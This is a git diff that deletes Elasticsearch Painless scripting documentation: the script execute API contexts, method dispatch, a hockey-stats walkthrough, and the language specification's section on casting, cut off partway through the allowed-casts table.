-| `context_setup` | no | - | Additional parameters to the context. -|====== - -==== Contexts - -Contexts control how scripts are executed, what variables are available at runtime and what the return type is. - -===== Painless test context - -The `painless_test` context executes scripts as is and does not add any special parameters. -The only variable that is available is `params`, which can be used to access user defined values. -The result of the script is always converted to a string. -If no context is specified then this context is used by default. - -*Example* - -Request: - -[source,console] ----------------------------------------------------------------- -POST /_scripts/painless/_execute -{ - "script": { - "source": "params.count / params.total", - "params": { - "count": 100.0, - "total": 1000.0 - } - } -} ----------------------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - "result": "0.1" -} --------------------------------------------------- - -===== Filter context - -The `filter` context executes scripts as if they were executed inside a `script` query. -For testing purposes, a document must be provided so that it will be temporarily indexed in-memory and -is accessible from the script. More precisely, the _source, stored fields and doc values of such a -document are available to the script being tested. - -The following parameters may be specified in `context_setup` for a filter context: - -document:: Contains the document that will be temporarily indexed in-memory and is accessible from the script. -index:: The name of an index containing a mapping that is compatible with the document being indexed. - -*Example* - -[source,console] ----------------------------------------------------------------- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "field": { - "type": "keyword" - } - } - } -} - -POST /_scripts/painless/_execute -{ - "script": { - "source": "doc['field'].value.length() <= params.max_length", - "params": { - "max_length": 4 - } - }, - "context": "filter", - "context_setup": { - "index": "my-index-000001", - "document": { - "field": "four" - } - } -} ----------------------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - "result": true -} --------------------------------------------------- - - -===== Score context - -The `score` context executes scripts as if they were executed inside a `script_score` function in -`function_score` query. - -The following parameters may be specified in `context_setup` for a score context: - -document:: Contains the document that will be temporarily indexed in-memory and is accessible from the script. -index:: The name of an index containing a mapping that is compatible with the document being indexed. -query:: If `_score` is used in the script then a query can specify that it will be used to compute a score. - -*Example* - -[source,console] ----------------------------------------------------------------- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "field": { - "type": "keyword" - }, - "rank": { - "type": "long" - } - } - } -} - - -POST /_scripts/painless/_execute -{ - "script": { - "source": "doc['rank'].value / params.max_rank", - "params": { - "max_rank": 5.0 - } - }, - "context": "score", - "context_setup": { - "index": "my-index-000001", - "document": { - "rank": 4 - } - } -} ----------------------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - "result": 0.8 -} --------------------------------------------------- diff --git a/docs/painless/painless-guide/painless-method-dispatch.asciidoc b/docs/painless/painless-guide/painless-method-dispatch.asciidoc deleted file mode 100644 index dcb5a5b3cd1..00000000000 --- a/docs/painless/painless-guide/painless-method-dispatch.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[modules-scripting-painless-dispatch]] -=== How painless dispatches functions - -Painless uses receiver, name, and {wikipedia}/Arity[arity] -for method dispatch. For example, `s.foo(a, b)` is resolved by first getting -the class of `s` and then looking up the method `foo` with two parameters. This -is different from Groovy which uses the -{wikipedia}/Multiple_dispatch[runtime types] of the -parameters and Java which uses the compile time types of the parameters. - -The consequence of this that Painless doesn't support overloaded methods like -Java, leading to some trouble when it allows classes from the Java -standard library. For example, in Java and Groovy, `Matcher` has two methods: -`group(int)` and `group(String)`. Painless can't allow both of these methods -because they have the same name and the same number of parameters. So instead it -has `group(int)` and `namedGroup(String)`. - -We have a few justifications for this different way of dispatching methods: - -1. It makes operating on `def` types simpler and, presumably, faster. Using -receiver, name, and arity means that when Painless sees a call on a `def` object it -can dispatch the appropriate method without having to do expensive comparisons -of the types of the parameters. The same is true for invocations with `def` -typed parameters. -2. It keeps things consistent. It would be genuinely weird for Painless to -behave like Groovy if any `def` typed parameters were involved and Java -otherwise. It'd be slow for it to behave like Groovy all the time. -3. It keeps Painless maintainable. Adding the Java or Groovy like method -dispatch *feels* like it'd add a ton of complexity which'd make maintenance and -other improvements much more difficult. diff --git a/docs/painless/painless-guide/painless-walkthrough.asciidoc b/docs/painless/painless-guide/painless-walkthrough.asciidoc deleted file mode 100644 index f61cc7568dc..00000000000 --- a/docs/painless/painless-guide/painless-walkthrough.asciidoc +++ /dev/null @@ -1,342 +0,0 @@ -[[painless-walkthrough]] -=== A Brief Painless Walkthrough - -To illustrate how Painless works, let's load some hockey stats into an Elasticsearch index: - -[source,console] ----------------------------------------------------------------- -PUT hockey/_bulk?refresh -{"index":{"_id":1}} -{"first":"johnny","last":"gaudreau","goals":[9,27,1],"assists":[17,46,0],"gp":[26,82,1],"born":"1993/08/13"} -{"index":{"_id":2}} -{"first":"sean","last":"monohan","goals":[7,54,26],"assists":[11,26,13],"gp":[26,82,82],"born":"1994/10/12"} -{"index":{"_id":3}} -{"first":"jiri","last":"hudler","goals":[5,34,36],"assists":[11,62,42],"gp":[24,80,79],"born":"1984/01/04"} -{"index":{"_id":4}} -{"first":"micheal","last":"frolik","goals":[4,6,15],"assists":[8,23,15],"gp":[26,82,82],"born":"1988/02/17"} -{"index":{"_id":5}} -{"first":"sam","last":"bennett","goals":[5,0,0],"assists":[8,1,0],"gp":[26,1,0],"born":"1996/06/20"} -{"index":{"_id":6}} -{"first":"dennis","last":"wideman","goals":[0,26,15],"assists":[11,30,24],"gp":[26,81,82],"born":"1983/03/20"} -{"index":{"_id":7}} -{"first":"david","last":"jones","goals":[7,19,5],"assists":[3,17,4],"gp":[26,45,34],"born":"1984/08/10"} -{"index":{"_id":8}} -{"first":"tj","last":"brodie","goals":[2,14,7],"assists":[8,42,30],"gp":[26,82,82],"born":"1990/06/07"} -{"index":{"_id":39}} -{"first":"mark","last":"giordano","goals":[6,30,15],"assists":[3,30,24],"gp":[26,60,63],"born":"1983/10/03"} -{"index":{"_id":10}} -{"first":"mikael","last":"backlund","goals":[3,15,13],"assists":[6,24,18],"gp":[26,82,82],"born":"1989/03/17"} -{"index":{"_id":11}} -{"first":"joe","last":"colborne","goals":[3,18,13],"assists":[6,20,24],"gp":[26,67,82],"born":"1990/01/30"} ----------------------------------------------------------------- -// TESTSETUP - -[discrete] -==== Accessing Doc Values from Painless - -Document values can be accessed from a `Map` named `doc`. - -For example, the following script calculates a player's total goals. This example uses a strongly typed `int` and a `for` loop. - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "query": { - "function_score": { - "script_score": { - "script": { - "lang": "painless", - "source": """ - int total = 0; - for (int i = 0; i < doc['goals'].length; ++i) { - total += doc['goals'][i]; - } - return total; - """ - } - } - } - } -} ----------------------------------------------------------------- - -Alternatively, you could do the same thing using a script field instead of a function score: - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "query": { - "match_all": {} - }, - "script_fields": { - "total_goals": { - "script": { - "lang": "painless", - "source": """ - int total = 0; - for (int i = 0; i < doc['goals'].length; ++i) { - total += doc['goals'][i]; - } - return total; - """ - } - } - } -} ----------------------------------------------------------------- - -The following example uses a Painless script to sort the players by their combined first and last names. The names are accessed using -`doc['first'].value` and `doc['last'].value`. - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "query": { - "match_all": {} - }, - "sort": { - "_script": { - "type": "string", - "order": "asc", - "script": { - "lang": "painless", - "source": "doc['first.keyword'].value + ' ' + doc['last.keyword'].value" - } - } - } -} ----------------------------------------------------------------- - - -[discrete] -==== Missing values - -`doc['field'].value` throws an exception if -the field is missing in a document. - -To check if a document is missing a value, you can call -`doc['field'].size() == 0`. - - -[discrete] -==== Updating Fields with Painless - -You can also easily update fields. You access the original source for a field as `ctx._source.`. - -First, let's look at the source data for a player by submitting the following request: - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "query": { - "term": { - "_id": 1 - } - } -} ----------------------------------------------------------------- - -To change player 1's last name to `hockey`, simply set `ctx._source.last` to the new value: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update/1 -{ - "script": { - "lang": "painless", - "source": "ctx._source.last = params.last", - "params": { - "last": "hockey" - } - } -} ----------------------------------------------------------------- - -You can also add fields to a document. For example, this script adds a new field that contains -the player's nickname, _hockey_. - -[source,console] ----------------------------------------------------------------- -POST hockey/_update/1 -{ - "script": { - "lang": "painless", - "source": """ - ctx._source.last = params.last; - ctx._source.nick = params.nick - """, - "params": { - "last": "gaudreau", - "nick": "hockey" - } - } -} ----------------------------------------------------------------- - -[discrete] -[[modules-scripting-painless-dates]] -==== Dates - -Date fields are exposed as -`ZonedDateTime`, so they support methods like `getYear`, `getDayOfWeek` -or e.g. getting milliseconds since epoch with `getMillis`. To use these -in a script, leave out the `get` prefix and continue with lowercasing the -rest of the method name. For example, the following returns every hockey -player's birth year: - -[source,console] ----------------------------------------------------------------- -GET hockey/_search -{ - "script_fields": { - "birth_year": { - "script": { - "source": "doc.born.value.year" - } - } - } -} ----------------------------------------------------------------- - -[discrete] -[[modules-scripting-painless-regex]] -==== Regular expressions - -NOTE: Regexes are enabled by default as the Setting `script.painless.regex.enabled` -has a new option, `limited`, the default. This defaults to using regular expressions -but limiting the complexity of the regular expressions. Innocuous looking regexes -can have staggering performance and stack depth behavior. But still, they remain an -amazingly powerful tool. In addition, to `limited`, the setting can be set to `true`, -as before, which enables regular expressions without limiting them.To enable them -yourself set `script.painless.regex.enabled: true` in `elasticsearch.yml`. - -Painless's native support for regular expressions has syntax constructs: - -* `/pattern/`: Pattern literals create patterns. This is the only way to create -a pattern in painless. The pattern inside the ++/++'s are just -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java regular expressions]. -See <> for more. -* `=~`: The find operator return a `boolean`, `true` if a subsequence of the -text matches, `false` otherwise. -* `==~`: The match operator returns a `boolean`, `true` if the text matches, -`false` if it doesn't. - -Using the find operator (`=~`) you can update all hockey players with "b" in -their last name: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": """ - if (ctx._source.last =~ /b/) { - ctx._source.last += "matched"; - } else { - ctx.op = "noop"; - } - """ - } -} ----------------------------------------------------------------- - -Using the match operator (`==~`) you can update all the hockey players whose -names start with a consonant and end with a vowel: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": """ - if (ctx._source.last ==~ /[^aeiou].*[aeiou]/) { - ctx._source.last += "matched"; - } else { - ctx.op = "noop"; - } - """ - } -} ----------------------------------------------------------------- - -You can use the `Pattern.matcher` directly to get a `Matcher` instance and -remove all of the vowels in all of their last names: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": "ctx._source.last = /[aeiou]/.matcher(ctx._source.last).replaceAll('')" - } -} ----------------------------------------------------------------- - -`Matcher.replaceAll` is just a call to Java's `Matcher`'s -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Matcher.html#replaceAll-java.lang.String-[replaceAll] -method so it supports `$1` and `\1` for replacements: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": "ctx._source.last = /n([aeiou])/.matcher(ctx._source.last).replaceAll('$1')" - } -} ----------------------------------------------------------------- - -If you need more control over replacements you can call `replaceAll` on a -`CharSequence` with a `Function` that builds the replacement. -This does not support `$1` or `\1` to access replacements because you already -have a reference to the matcher and can get them with `m.group(1)`. - -IMPORTANT: Calling `Matcher.find` inside of the function that builds the -replacement is rude and will likely break the replacement process. - -This will make all of the vowels in the hockey player's last names upper case: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": """ - ctx._source.last = ctx._source.last.replaceAll(/[aeiou]/, m -> - m.group().toUpperCase(Locale.ROOT)) - """ - } -} ----------------------------------------------------------------- - -Or you can use the `CharSequence.replaceFirst` to make the first vowel in their -last names upper case: - -[source,console] ----------------------------------------------------------------- -POST hockey/_update_by_query -{ - "script": { - "lang": "painless", - "source": """ - ctx._source.last = ctx._source.last.replaceFirst(/[aeiou]/, m -> - m.group().toUpperCase(Locale.ROOT)) - """ - } -} ----------------------------------------------------------------- - -Note: all of the `_update_by_query` examples above could really do with a -`query` to limit the data that they pull back. While you *could* use a -{ref}/query-dsl-script-query.html[script query] it wouldn't be as efficient -as using any other query because script queries aren't able to use the inverted -index to limit the documents that they have to check. diff --git a/docs/painless/painless-lang-spec.asciidoc b/docs/painless/painless-lang-spec.asciidoc deleted file mode 100644 index aeb1a9d4c75..00000000000 --- a/docs/painless/painless-lang-spec.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -[[painless-lang-spec]] -== Painless Language Specification - -Painless is a scripting language designed for security and performance. -Painless syntax is similar to Java syntax along with some additional -features such as dynamic typing, Map and List accessor shortcuts, and array -initializers. As a direct comparison to Java, there are some important -differences, especially related to the casting model. For more detailed -conceptual information about the basic constructs that Painless and Java share, -refer to the corresponding topics in the -https://docs.oracle.com/javase/specs/jls/se8/html/index.html[Java Language -Specification]. - -Painless scripts are parsed and compiled using the https://www.antlr.org/[ANTLR4] -and https://asm.ow2.org/[ASM] libraries. Scripts are compiled directly -into Java Virtual Machine (JVM) byte code and executed against a standard JVM. -This specification uses ANTLR4 grammar notation to describe the allowed syntax. -However, the actual Painless grammar is more compact than what is shown here. - -include::painless-lang-spec/index.asciidoc[] diff --git a/docs/painless/painless-lang-spec/index.asciidoc b/docs/painless/painless-lang-spec/index.asciidoc deleted file mode 100644 index e75264ff3e4..00000000000 --- a/docs/painless/painless-lang-spec/index.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -include::painless-comments.asciidoc[] - -include::painless-keywords.asciidoc[] - -include::painless-literals.asciidoc[] - -include::painless-identifiers.asciidoc[] - -include::painless-variables.asciidoc[] - -include::painless-types.asciidoc[] - -include::painless-casting.asciidoc[] - -include::painless-operators.asciidoc[] - -include::painless-operators-general.asciidoc[] - -include::painless-operators-numeric.asciidoc[] - -include::painless-operators-boolean.asciidoc[] - -include::painless-operators-reference.asciidoc[] - -include::painless-operators-array.asciidoc[] - -include::painless-statements.asciidoc[] - -include::painless-scripts.asciidoc[] - -include::painless-functions.asciidoc[] - -include::painless-lambdas.asciidoc[] - -include::painless-regexes.asciidoc[] diff --git a/docs/painless/painless-lang-spec/painless-casting.asciidoc b/docs/painless/painless-lang-spec/painless-casting.asciidoc deleted file mode 100644 index 25e7e345ba0..00000000000 --- a/docs/painless/painless-lang-spec/painless-casting.asciidoc +++ /dev/null @@ -1,536 +0,0 @@ -[[painless-casting]] -=== Casting - -A cast converts the value of an original type to the equivalent value of a -target type. An implicit cast infers the target type and automatically occurs -during certain <>. An explicit cast specifies -the target type and forcefully occurs as its own operation. Use the `cast -operator '()'` to specify an explicit cast. - -Refer to the <> for a quick reference on all -allowed casts. - -*Errors* - -* If during a cast there exists no equivalent value for the target type. -* If an implicit cast is given, but an explicit cast is required. - -*Grammar* - -[source,ANTLR4] ----- -cast: '(' TYPE ')' expression ----- - -*Examples* - -* Valid casts. -+ -[source,Painless] ----- -int i = (int)5L; <1> -Map m = new HashMap(); <2> -HashMap hm = (HashMap)m; <3> ----- -+ -<1> declare `int i`; - explicit cast `long 5` to `int 5` -> `int 5`; - store `int 5` to `i` -<2> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `m` -<3> declare `HashMap hm`; - load from `m` -> `Map reference`; - explicit cast `Map reference` to `HashMap reference` -> `HashMap reference`; - store `HashMap reference` to `hm` - -[[numeric-type-casting]] -==== Numeric Type Casting - -A <> cast converts the value of an original -numeric type to the equivalent value of a target numeric type. A cast between -two numeric type values results in data loss when the value of the original -numeric type is larger than the target numeric type can accommodate. A cast -between an integer type value and a floating point type value can result in -precision loss. - -The allowed casts for values of each numeric type are shown as a row in the -following table: - -|==== -| | byte | short | char | int | long | float | double -| byte | | implicit | implicit | implicit | implicit | implicit | implicit -| short | explicit | | explicit | implicit | implicit | implicit | implicit -| char | explicit | explicit | | implicit | implicit | implicit | implicit -| int | explicit | explicit | explicit | | implicit | implicit | implicit -| long | explicit | explicit | explicit | explicit | | implicit | implicit -| float | explicit | explicit | explicit | explicit | explicit | | implicit -| double | explicit | explicit | explicit | explicit | explicit | explicit | -|==== - -*Examples* - -* Valid numeric type casts. -+ -[source,Painless] ----- -int a = 1; <1> -long b = a; <2> -short c = (short)b; <3> -double e = (double)a; <4> ----- -+ -<1> declare `int a`; - store `int 1` to `a` -<2> declare `long b`; - load from `a` -> `int 1`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `b` -<3> declare `short c`; - load from `b` -> `long 1`; - explicit cast `long 1` to `short 1` -> `short 1`; - store `short 1` value to `c` -<4> declare `double e`; - load from `a` -> `int 1`; - explicit cast `int 1` to `double 1.0`; - store `double 1.0` to `e`; - (note the explicit cast is extraneous since an implicit cast is valid) -+ -* Invalid numeric type casts resulting in errors. -+ -[source,Painless] ----- -int a = 1.0; // error <1> -int b = 2; <2> -byte c = b; // error <3> ----- -+ -<1> declare `int i`; - *error* -> cannot implicit cast `double 1.0` to `int 1`; - (note an explicit cast is valid) -<2> declare `int b`; - store `int 2` to `b` -<3> declare byte `c`; - load from `b` -> `int 2`; - *error* -> cannot implicit cast `int 2` to `byte 2`; - (note an explicit cast is valid) - -[[reference-type-casting]] -==== Reference Type Casting - -A <> cast converts the value of an original -reference type to the equivalent value of a target reference type. An implicit -cast between two reference type values is allowed when the original reference -type is a descendant of the target type. An explicit cast between two reference -type values is allowed when the original type is a descendant of the target type -or the target type is a descendant of the original type. - -*Examples* - -* Valid reference type casts. -+ -[source,Painless] ----- -List x; <1> -ArrayList y = new ArrayList(); <2> -x = y; <3> -y = (ArrayList)x; <4> -x = (List)y; <5> ----- -+ -<1> declare `List x`; - store default value `null` to `x` -<2> declare `ArrayList y`; - allocate `ArrayList` instance -> `ArrayList reference`; - store `ArrayList reference` to `y`; -<3> load from `y` -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `x`; - (note `ArrayList` is a descendant of `List`) -<4> load from `x` -> `List reference`; - explicit cast `List reference` to `ArrayList reference` - -> `ArrayList reference`; - store `ArrayList reference` to `y`; -<5> load from `y` -> `ArrayList reference`; - explicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `x`; - (note the explicit cast is extraneous, and an implicit cast is valid) -+ -* Invalid reference type casts resulting in errors. -+ -[source,Painless] ----- -List x = new ArrayList(); <1> -ArrayList y = x; // error <2> -Map m = (Map)x; // error <3> ----- -+ -<1> declare `List x`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `x` -<2> declare `ArrayList y`; - load from `x` -> `List reference`; - *error* -> cannot implicit cast `List reference` to `ArrayList reference`; - (note an explicit cast is valid since `ArrayList` is a descendant of `List`) -<3> declare `ArrayList y`; - load from `x` -> `List reference`; - *error* -> cannot explicit cast `List reference` to `Map reference`; - (note no cast is valid since neither `List` nor `Map` is a descendant of the - other) - -[[dynamic-type-casting]] -==== Dynamic Type Casting - -A <> cast converts the value of an original -`def` type to the equivalent value of any target type or converts the value of -any original type to the equivalent value of a target `def` type. - -An implicit cast from any original type value to a `def` type value is always -allowed. An explicit cast from any original type value to a `def` type value is -always allowed but never necessary. - -An implicit or explicit cast from an original `def` type value to -any target type value is allowed if and only if the cast is normally allowed -based on the current type value the `def` type value represents. - -*Examples* - -* Valid dynamic type casts with any original type to a target `def` type. -+ -[source,Painless] ----- -def d0 = 3; <1> -d0 = new ArrayList(); <2> -Object o = new HashMap(); <3> -def d1 = o; <4> -int i = d1.size(); <5> ----- -+ -<1> declare `def d0`; - implicit cast `int 3` to `def`; - store `int 3` to `d0` -<2> allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `d0` -<3> declare `Object o`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Object reference` - -> `Object reference`; - store `Object reference` to `o` -<4> declare `def d1`; - load from `o` -> `Object reference`; - implicit cast `Object reference` to `def` -> `def`; - store `def` to `d1` -<5> declare `int i`; - load from `d1` -> `def`; - implicit cast `def` to `HashMap reference` -> HashMap reference`; - call `size` on `HashMap reference` -> `int 0`; - store `int 0` to `i`; - (note `def` was implicit cast to `HashMap reference` since `HashMap` is the - child-most descendant type value that the `def` type value - represents) -+ -* Valid dynamic type casts with an original `def` type to any target type. -+ -[source,Painless] ----- -def d = 1.0; <1> -int i = (int)d; <2> -d = 1; <3> -float f = d; <4> -d = new ArrayList(); <5> -List l = d; <6> ----- -+ -<1> declare `def d`; - implicit cast `double 1.0` to `def` -> `def`; - store `def` to `d` -<2> declare `int i`; - load from `d` -> `def`; - implicit cast `def` to `double 1.0` -> `double 1.0`; - explicit cast `double 1.0` to `int 1` -> `int 1`; - store `int 1` to `i`; - (note the explicit cast is necessary since a `double` type value is not - converted to an `int` type value implicitly) -<3> store `int 1` to `d`; - (note the switch in the type `d` represents from `double` to `int`) -<4> declare `float i`; - load from `d` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - implicit cast `int 1` to `float 1.0` -> `float 1.0`; - store `float 1.0` to `f` -<5> allocate `ArrayList` instance -> `ArrayList reference`; - store `ArrayList reference` to `d`; - (note the switch in the type `d` represents from `int` to `ArrayList`) -<6> declare `List l`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `l` -+ -* Invalid dynamic type casts resulting in errors. -+ -[source,Painless] ----- -def d = 1; <1> -short s = d; // error <2> -d = new HashMap(); <3> -List l = d; // error <4> ----- -<1> declare `def d`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `d` -<2> declare `short s`; - load from `d` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - *error* -> cannot implicit cast `int 1` to `short 1`; - (note an explicit cast is valid) -<3> allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def`; - store `def` to `d` -<4> declare `List l`; - load from `d` -> `def`; - implicit cast `def` to `HashMap reference`; - *error* -> cannot implicit cast `HashMap reference` to `List reference`; - (note no cast is valid since neither `HashMap` nor `List` is a descendant of - the other) - -[[string-character-casting]] -==== String to Character Casting - -Use the cast operator to convert a <> value into a -<> value. - -*Errors* - -* If the `String` type value isn't one character in length. -* If the `String` type value is `null`. - -*Examples* - -* Casting string literals into `char` type values. -+ -[source,Painless] ----- -char c = (char)"C"; <1> -c = (char)'c'; <2> ----- -+ -<1> declare `char c`; - explicit cast `String "C"` to `char C` -> `char C`; - store `char C` to `c` -<2> explicit cast `String 'c'` to `char c` -> `char c`; - store `char c` to `c` -+ -* Casting a `String` reference into a `char` type value. -+ -[source,Painless] ----- -String s = "s"; <1> -char c = (char)s; <2> ----- -<1> declare `String s`; - store `String "s"` to `s`; -<2> declare `char c` - load from `s` -> `String "s"`; - explicit cast `String "s"` to `char s` -> `char s`; - store `char s` to `c` - -[[character-string-casting]] -==== Character to String Casting - -Use the cast operator to convert a <> value into a -<> value. - -*Examples* - -* Casting a `String` reference into a `char` type value. -+ -[source,Painless] ----- -char c = 65; <1> -String s = (String)c; <2> ----- -<1> declare `char c`; - store `char 65` to `c`; -<2> declare `String s` - load from `c` -> `char A`; - explicit cast `char A` to `String "A"` -> `String "A"`; - store `String "A"` to `s` - -[[boxing-unboxing]] -==== Boxing and Unboxing - -Boxing is a special type of cast used to convert a primitive type to its -corresponding reference type. Unboxing is the reverse used to convert a -reference type to its corresponding primitive type. - -Implicit boxing/unboxing occurs during the following operations: - -* Conversions between a `def` type and a primitive type are implicitly - boxed/unboxed as necessary, though this is referred to as an implicit cast - throughout the documentation. -* Method/function call arguments are implicitly boxed/unboxed as necessary. -* A primitive type value is implicitly boxed when a reference type method - is called on it. - -Explicit boxing/unboxing is not allowed. Use the reference type API to -explicitly convert a primitive type value to its respective reference type -value and vice versa. - -*Errors* - -* If an explicit cast is made to box/unbox a primitive type. - -*Examples* - -* Uses of implicit boxing/unboxing. -+ -[source,Painless] ----- -List l = new ArrayList(); <1> -l.add(1); <2> -Integer I = Integer.valueOf(0); <3> -int i = l.get(i); <4> ----- -+ -<1> declare `List l`; - allocate `ArrayList` instance -> `ArrayList reference`; - store `ArrayList reference` to `l`; -<2> load from `l` -> `List reference`; - implicit cast `int 1` to `def` -> `def`; - call `add` on `List reference` with arguments (`def`); - (note internally `int 1` is boxed to `Integer 1` to store as a `def` type - value) -<3> declare `Integer I`; - call `valueOf` on `Integer` with arguments of (`int 0`) -> `Integer 0`; - store `Integer 0` to `I`; -<4> declare `int i`; - load from `I` -> `Integer 0`; - unbox `Integer 0` -> `int 0`; - load from `l` -> `List reference`; - call `get` on `List reference` with arguments (`int 0`) -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - store `int 1` to `i`; - (note internally `int 1` is unboxed from `Integer 1` when loaded from a - `def` type value) -+ -* Uses of invalid boxing/unboxing resulting in errors. -+ -[source,Painless] ----- -Integer x = 1; // error <1> -Integer y = (Integer)1; // error <2> -int a = Integer.valueOf(1); // error <3> -int b = (int)Integer.valueOf(1); // error <4> ----- -+ -<1> declare `Integer x`; - *error* -> cannot implicit box `int 1` to `Integer 1` during assignment -<2> declare `Integer y`; - *error* -> cannot explicit box `int 1` to `Integer 1` during assignment -<3> declare `int a`; - call `valueOf` on `Integer` with arguments of (`int 1`) -> `Integer 1`; - *error* -> cannot implicit unbox `Integer 1` to `int 1` during assignment -<4> declare `int a`; - call `valueOf` on `Integer` with arguments of (`int 1`) -> `Integer 1`; - *error* -> cannot explicit unbox `Integer 1` to `int 1` during assignment - -[[promotion]] -==== Promotion - -Promotion is when a single value is implicitly cast to a certain type or -multiple values are implicitly cast to the same type as required for evaluation -by certain operations. Each operation that requires promotion has a promotion -table that shows all required implicit casts based on the type(s) of value(s). A -value promoted to a `def` type at compile-time is promoted again at run-time -based on the type the `def` value represents. - -*Errors* - -* If a specific operation cannot find an allowed promotion type for the type(s) - of value(s) given. - -*Examples* - -* Uses of promotion. -+ -[source,Painless] ----- -double d = 2 + 2.0; <1> -def x = 1; <2> -float f = x + 2.0F; <3> ----- -<1> declare `double d`; - promote `int 2` and `double 2.0 @0`: result `double`; - implicit cast `int 2` to `double 2.0 @1` -> `double 2.0 @1`; - add `double 2.0 @1` and `double 2.0 @0` -> `double 4.0`; - store `double 4.0` to `d` -<2> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x`; -<3> declare `float f`; - load from `x` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - promote `int 1` and `float 2.0`: result `float`; - implicit cast `int 1` to `float 1.0` -> `float `1.0`; - add `float 1.0` and `float 2.0` -> `float 3.0`; - store `float 3.0` to `f`; - (note this example illustrates promotion done at run-time as promotion - done at compile-time would have resolved to a `def` type value) - -[[allowed-casts]] -==== Allowed Casts - -The following tables show all allowed casts. Read the tables row by row, where -the original type is shown in the first column, and each subsequent column -indicates whether a cast to the specified target type is implicit (I), -explicit (E), boxed/unboxed for methods only (A), a reference type cast (@), -or is not allowed (-). See <> -for allowed reference type casts. - -*Primitive/Reference Types* - -[cols="<3,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | O | N | T | b | y | s | c | i | j | f | d | B | Y | S | C | I | J | F | D | R | def -| Object ( O ) | | @ | @ | - | - | - | - | - | - | - | - | @ | @ | @ | @ | @ | @ | @ | @ | @ | I -| Number ( N ) | I | | - | - | - | - | - | - | - | - | - | - | @ | @ | - | @ | @ | @ | @ | @ | I -| String ( T ) | I | - | | - | - | - | - | - | - | - | - | - | - | - | E | - | - | - | - | - | I -| boolean ( b ) | A | - | - | | - | - | - | - | - | - | - | A | - | - | - | - | - | - | - | - | I -| byte ( y ) | A | A | - | - | | I | E | I | I | I | I | - | A | A | - | A | A | A | A | - | I -| short ( s ) | A | A | - | - | E | | E | I | I | I | I | - | - | A | - | A | A | A | A | - | I -| char ( c ) | A | - | E | - | E | E | | I | I | I | I | - | - | - | A | A | A | A | A | - | I -| int ( i ) | A | A | - | - | E | E | E | | I | I | I | - | - | - | - | A | A | A | A | - | I -| long ( j ) | A | A | - | - | E | E | E | E | | I | I | - | - | - | - | - | A | A | A | - | I -| float ( f ) | A | A | - | - | E | E | E | E | E | | I | - | - | - | - | - | - | A | A | - | I -| double ( d ) | A | A | - | - | E | E | E | E | E | E | | - | - | - | - | - | - | - | A | - | I -| Boolean ( B ) | A | - | - | A | - | - | - | - | - | - | - | | - | - | - | - | - | - | - | @ | I -| Byte ( Y ) | A | I | - | - | A | A | - | A | A | A | A | - | | A | - | A | A | A | A | @ | I -| Short ( S ) | A | I | - | - | - | A | - | A | A | A | A | - | - | | - | A | A | A | A | @ | I -| Character ( C ) | A | - | - | - | - | - | A | A | A | A | A | - | - | - | | A | A | A | A | @ | I -| Integer ( I ) | A | - | - | - | - | - | - | A | A | A | A | - | - | - | - | | A | A | A | @ | I -| Long ( J ) | A | - | - | - | - | - | - | - | A | A | A | - | - | - | - | - | | A | A | @ | I -| Float ( F ) | A | - | - | - | - | - | - | - | - | A | A | - | - | - | - | - | - | | A | @ | I -| Double ( D ) | A | - | - | - | - | - | - | - | - | - | A | - | - | - | - | - | - | - | | @ | I -| Reference ( R ) | I | @ | @ | - | - | - | - | - | - | - | - | @ | @ | @ | @ | @ | @ | @ | @ | @ | I -|==== - -*`def` Type* - -[cols="<3,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | O | N | T | b | y | s | c | i | j | f | d | B | Y | S | C | I | J | F | D | R -| def as String | I | - | I | - | - | - | E | - | - | - | - | - | - | - | E | - | - | - | - | @ -| def as boolean/Boolean | I | - | - | I | - | - | - | - | - | - | - | I | - | - | - | - | - | - | 